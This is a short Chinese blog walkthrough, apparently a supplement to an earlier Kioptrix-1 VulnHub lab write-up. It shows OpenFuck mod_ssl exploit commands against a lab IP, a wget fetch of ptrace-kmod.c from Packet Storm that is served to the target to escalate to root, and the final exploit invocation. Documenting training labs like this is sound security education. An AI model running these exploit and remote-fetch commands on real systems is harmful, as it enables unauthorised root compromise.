该文章是对前面的kioptrix-1靶机的补充,前面出现的问题搞清楚了
whitehe,公众号:泷羽sec-何生安全vulnhub靶场【kioptrix-1】靶机
这里原因是我顺序搞错了,没仔细看帮助用法
./openfuck 0x6a 192.168.1.104 443
./openfuck 0x6b 192.168.1.104 443
测试,发现第二个0x6b
可获取,但是获取的并非root
权限,提示是执行后缺失文件
不过这里缺失的文件,给出了下载链接
但是这里是对靶机内缺失的文件进行下载,所以在kali
先下载该文件后,再通过python
开启简易http
服务,下载到靶机内
wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
因为获取的 shell 当前目录就是在/tmp
。所以可以下载,所以直接使用wget
下载到这里
这时候再执行该脚本,即可发现成功获取到root
,不过这里的命令需要在后面加上-c
./openfuck 0x6b 192.168.1.104 443 -c 40
原文始发于微信公众号(泷羽sec-何生安全):kioptrix-1靶机的补充
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论